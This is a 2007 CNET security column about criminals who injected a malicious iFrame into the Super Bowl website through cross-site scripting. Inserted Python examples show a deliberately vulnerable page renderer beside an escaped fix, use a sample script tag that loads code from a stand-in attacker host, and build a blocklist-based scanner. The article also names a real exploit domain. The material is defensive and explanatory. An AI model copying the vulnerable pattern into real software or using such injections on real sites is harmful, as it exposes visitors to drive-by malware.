Security Watch: Don't get burned by viruses and hackers
Hacking the Super Bowl
By Robert Vamosi 
Senior editor, CNET Reviews
February 16, 2007

Not too long ago, security researcher Roger Thompson had an epiphany. He already had his global distributed network of honeypots well established and had detected more than a few breaking viruses. But the days of seeing new threats such as Sasser and Netsky, both of which lit up his switchboard instantly, were over. Now attacks light up one honeypot in one part of the world, then in another part, then another. The new attacks, he realized, were increasingly targeted and were being carefully meted out to avoid detection by honeypot networks such as his own. Today's attacks are being discovered only by reading the honeypot log files well after the fact. Thompson realized that the current model was backward. Rather than sitting back and waiting for attacks to come to him, he needed a more active model; he needed to go and find the attacks as they are happening. And it's a good thing he made this paradigm shift. Shortly before the 2007 Super Bowl, thousands of visitors to the official Super Bowl Web site quickly discovered how a perfectly legit Web site could also be the source of rather nasty Trojan horses.

Super Bowl exploits
At last week's RSA Conference in San Francisco, just days after the Super Bowl attack, I sat down with Thompson. On his laptop, he showed me the simple line of JavaScript code that pointed Super Bowl site visitors to a known criminal hacker exploit server. Apparently, there was a cross-site scripting error on the official Super Bowl Web site that allowed some criminal hackers to inject a poisoned iFrame tag. And it wasn't just the Super Bowl site--it turns out there were several others, mostly healthcare related, including the U.S. Centers for Disease Control.


Injecting malicious code onto legitimate Web sites is deceptively simple to do, assuming the Web site is vulnerable, that is. A criminal hacker needs little more than an Internet browser to accomplish his task. The criminal hackers who did this apparently surfed the Super Bowl site, appended a script tag and some code calling their exploit server to an existing URL, then revisited the site. As the HTTP page request passed to the Web server, the server read the script command and added the malicious iFrame code to the legitimate Super Bowl Web site. Future visitors to the site would now download that iFrame code.
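The mechanism the column describes, a page that echoes part of the request URL back into its own HTML without encoding it, is easiest to see beside the fixed version. The following is an added illustration, not code from the Super Bowl site (whose server stack is not stated here) and not Thompson's; the search page, the `q` parameter, the `exploit-host.invalid` host name and the `1.js` file name are constructed stand-ins. The first renderer reproduces the defect; the second applies the standard fix of HTML-escaping any request-controlled value before it is placed in the markup, so the same input arrives in the page as inert text.

```python
import html
from urllib.parse import parse_qs, quote


def _query_param(query_string: str, name: str) -> str:
    """Return the first value of a query-string parameter, or an empty string."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """'Before' form: reflects the q parameter into the page verbatim.

    Any markup in the parameter becomes live HTML for whoever receives
    this response, which is the class of defect the column describes.
    """
    q = _query_param(query_string, "q")
    return f"<html><body><p>Results for: {q}</p></body></html>"


def render_hardened(query_string: str) -> str:
    """Same page with the parameter HTML-escaped before it reaches the markup."""
    q = _query_param(query_string, "q")
    return f"<html><body><p>Results for: {html.escape(q, quote=True)}</p></body></html>"


# Constructed input shaped like what the column describes: a script tag that
# loads a file from an external host. The host is a placeholder, not a real server.
INJECTED_MARKUP = '<script src="http://exploit-host.invalid/1.js"></script>'


def contains_live_script(page: str) -> bool:
    """Crude check used here only to show whether the reflected value is live markup."""
    return "<script" in page.lower()


def demo() -> tuple[bool, bool]:
    """Render the constructed request through both handlers and report which one
    emits an executable script tag. Returns (vulnerable_is_live, hardened_is_live)."""
    query = "q=" + quote(INJECTED_MARKUP)   # percent-encode it as a browser would
    return (
        contains_live_script(render_vulnerable(query)),
        contains_live_script(render_hardened(query)),
    )


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable handler emits live script tag:", vulnerable)  # True
    print("hardened handler emits live script tag:  ", hardened)    # False
```

Escaping at output time is the fix that matters here: `parse_qs` has already percent-decoded the value, so the only thing standing between the request and the browser's HTML parser is whether the server encodes `<`, `>`, `"` and `&` before concatenating the string into the page.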

Not a phishing site
There are tools available that will check and verify the relative security of Web sites. One, McAfee SiteAdvisor, ranks the relative safety of thousands of Web sites. But the defaced Super Bowl site was not a phishing site, so SiteAdvisor gave it its healthy seal of approval. Thompson's own tool, Linkscanner Pro, actively scans the page code as it is passed back from the Web server to your Web browser; it identified the exploit code and blocked it, while allowing users to access the site safely.


What the Super Bowl, the CDC, and hundreds of other defaced sites have in common are central servers hosting malware script; in this case, it was code that exploited patchable Microsoft Windows vulnerabilities. The Internet Storm Center identified sites such as dv521.com (a domain located in China) as hosting the malicious JavaScript files (known only as 1.js, 2.js, 3.js) used in the Super Bowl and CDC defacements.
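The two preceding sections describe a defensive idea worth making concrete: inspect the HTML as it comes back from the server, and flag content that pulls from a host the page has no business loading from, especially when it is hidden from the visitor. The scanner below is an added example of that kind of check; it is not Linkscanner Pro's logic, and the page URL, the sample HTML, the `exploit-host.invalid` host and the blocklist contents are all constructed. It collects every `<script src>` and `<iframe src>` from a response and reports (a) anything served from a host on a blocklist, such as the hosts the Internet Storm Center identified, and (b) any off-site iframe sized to zero or hidden with CSS, which is the shape of the injected tag described above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class RemoteContentCollector(HTMLParser):
    """Collects every <script> and <iframe> start tag that carries a src attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.items: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            attributes = {k: (v or "") for k, v in attrs}
            if attributes.get("src"):
                self.items.append((tag, attributes))


def _is_hidden(attrs: dict) -> bool:
    """True if the element is sized to nothing or hidden via inline style."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = {"0", "0px"}
    return (
        attrs.get("width") in zero
        or attrs.get("height") in zero
        or "display:none" in style
        or "visibility:hidden" in style
    )


def scan_response(page_url: str, body: str, blocklist=frozenset()) -> list[tuple[str, str, str]]:
    """Return (reason, tag, absolute_src) findings for suspicious remote content.

    Relative src values are resolved against page_url so same-origin assets
    are recognised as such and not reported.
    """
    page_host = urlparse(page_url).hostname
    collector = RemoteContentCollector()
    collector.feed(body)
    findings = []
    for tag, attrs in collector.items:
        src = urljoin(page_url, attrs["src"])
        host = urlparse(src).hostname or ""
        if host in blocklist:
            findings.append(("known-exploit-host", tag, src))
        elif tag == "iframe" and host != page_host and _is_hidden(attrs):
            findings.append(("hidden-third-party-iframe", tag, src))
    return findings


# Constructed response: a legitimate page with one injected zero-size iframe.
SAMPLE_PAGE_URL = "http://www.example-stadium.test/"
SAMPLE_PAGE = """
<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.test/lib.js"></script>
</head><body>
<h1>Game day</h1>
<iframe src="http://exploit-host.invalid/1.js" width="0" height="0"></iframe>
<iframe src="http://video.example.test/player" width="640" height="360"></iframe>
</body></html>
"""
# Placeholder blocklist; in practice populated from a feed such as the ISC report.
KNOWN_EXPLOIT_HOSTS = frozenset({"exploit-host.invalid"})


if __name__ == "__main__":
    for finding in scan_response(SAMPLE_PAGE_URL, SAMPLE_PAGE, KNOWN_EXPLOIT_HOSTS):
        print(finding)
```

The two rules are deliberately independent: the blocklist catches a known server no matter how the tag is dressed up, while the hidden-iframe rule catches the same injection technique before anyone has added the host to a list. The visible off-site iframe (the video player) is left alone, which is what keeps a check like this usable on ordinary pages.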

Whack a mole
Thompson, and others I spoke with at RSA, believe there are perhaps a handful of true malicious code geniuses working in the world today. You'll probably never know their names, but you might run across their handiwork from time to time on the Internet. Protecting these guys are Internet gangs that buy the malicious code, then distribute it by defacing Web sites such as the Super Bowl's or the CDC's to lure unsuspecting people into compromising their machines. Once compromised, a desktop PC could become part of a botnet, a spam relay, or a target of identity theft.

Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world; indeed, the infected pages identified by Thompson's Linkscanner Pro often point to just a few dozen Web servers. If Thompson and others do shut down one exploit server site, the Internet gangs start using a different URL instead. Often the exploit servers are hosted in parts of the world where laws, language, or even basic understanding of the problem make it hard to remove the malicious content from the Internet.

Prevention
After using it for more than a week, I found Thompson's Linkscanner Pro is great at stopping the malicious code, but I also found it missed several reported phishing sites; it wasn't really designed for that. To identify and block phishing sites, use the free Netcraft toolbar alongside Thompson's tool. I find that Netcraft consistently blocks suspected phishing sites better than some of the paid antiphishing protection.

Are you using a safe browsing tool? Why or why not? Will you start using one now? Talk back to me.
TalkBack
10 messages

Article discussion: Hacking the Super Bowl


Latest post:

"...on any browser."
by Fil0403 - March 1, 2007 4:17 PM PST
Are you using a safe browsing tool? Yes, McAfee SiteAdvisor.

Why or why not? Because it's a wild world out there on the Internet, nowadays.

Will you start using one n...

we do windows at work

The policy at work is to use all MS all the time. Bummer. At home I don't use ...
by Tooniner - February 26, 2007 12:31 PM PST
0 out of 5 users found this comment helpful | 1 comment

what else to think about?

so how many more things are we going to have to think about while surfing the ne...
by mrsteve0924 - February 21, 2007 6:25 PM PST
5 out of 5 users found this comment helpful

Mozilla FireFox browser

I use Mozilla FireFox browser for the most part. I'm wondering if I'm more prote...
by CalicoSilk - February 20, 2007 10:13 PM PST

Linkscanner website

You can find Linkscanner Lite and Pro at http://www.explabs.com/products/. There...
by rspare - February 20, 2007 6:12 AM PST
5 out of 5 users found this comment helpful

Linkscanner Pro

OK, how do we get a copy???

The link that you gave in the article says...
by redco - February 19, 2007 6:26 PM PST


© 2008 CNET Networks, Inc., a CBS Company. All rights reserved. | Privacy Policy | Terms of Use